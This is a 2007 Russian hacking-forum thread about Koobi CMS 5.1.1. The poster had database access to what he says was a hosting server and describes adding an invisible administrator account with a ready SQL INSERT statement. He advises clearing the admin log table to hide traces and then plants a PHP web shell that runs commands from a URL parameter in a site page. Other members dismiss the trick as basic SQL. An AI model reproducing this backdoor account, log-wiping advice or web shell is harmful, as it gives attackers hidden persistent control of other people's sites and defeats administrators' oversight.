Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Сценарии/CMF/СMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   Добавление скрытого пользователя в Koobi CMS 5.1.1 (https://forum.antichat.xyz/showthread.php?t=55545)

otmorozok428 11.12.2007 16:10
Добавление скрытого пользователя в Koobi CMS 5.1.1
 
Недавно обнаружил прикольную фичу с добавлением пользователя. В общем, у меня был доступ к базе данных, а ля phpMyAdmin, но в админку CMS проникнуть никак не получалось, поскольку админский пароль был пошифрован md5 и никак не брутился.

Решение было вполне естественным - я добавил в базу CMS Koobi, своего юзера с админскими правами

Цитата:
INSERT INTO koobi_user (uid, ugroup, uname, email, pass) VALUES (3, 1, "guest", "guest@gmail.com", "202cb962ac59075b964b07152d234b70");
Здесь uid - уникальный порядковый номер пользователя,
uname - имя пользователя,
ugroup равный 1, указывает на то, что юзер - член группы админов,
email используется для логина, а
pass - это md5-хеш нашего пароля (в данном случае "123").

Успешно залогинившись и решив полюбоваться на себя в списке пользователей - обнаружил там лишь легальных зарегистрированных юзеров. Попробовал найти себя через поиск, но тоже обломался.

Правда, есть и палевный момент - если зайти в меню, где отображаются группы пользователей, можно увидеть, что в группе "Администраторы" состоят целых 2 чела, тогда как отображается только 1. Кроме того, в таблице koobi_adminlogs отображаются логины ВСЕХ существующих админов, т.е. эту табу надо регулярно подчищать.

После этого, я со спокойной совестью зайшёл в пункт "Статические страницы/Страницы/Редактировать" и добавил свою скромную лепту в текст какой-то статьи. Вот, так
{php}system($_GET['cmd']);{/php}
.

Scipio 11.12.2007 16:22
А вчем суть то, то что ты умеешь составлять SQL выражения? а насчет скрытности, я Koobi CMS не видел, но могу предположить, что за отображение отвечает другая табличка или вобще там какоето кеширование происходит, скорее всего первое

otmorozok428 11.12.2007 16:41
Суть в том, что ты имеешь невидимого пользователя в CMS с админскими правами. Согласись, Scipio, не всегда удобно работать с базой данных напрямую...

Scipio 11.12.2007 16:47
Вобще когда что нить взламываешь очень много неудобных вещей бывает, в твоем случае все довольно удобно сложилось, плюсенги я тебе за оформление поставлю, но суть твоего поста сводится к тому:"посмотрите как я умею", имхо пользы никакой

otmorozok428 11.12.2007 16:54
Собственно, это хостинг был :) Там было очень много неудобных phpMyAdminоv и надо было как-то в админки попасть... Действительно, очень удобно получилось :)

Constantine 11.12.2007 16:55
Это не уязвимость Cms имхо.

The_HuliGun 11.12.2007 18:19
Это вообще не уязвимость.

Spyder 11.12.2007 18:22
это называется я научился основам Sql

otmorozok428 11.12.2007 18:37
Налетели гуру и порвали в клочья :(
Ну не уязвимость - просто интересный факт...


Время: 09:06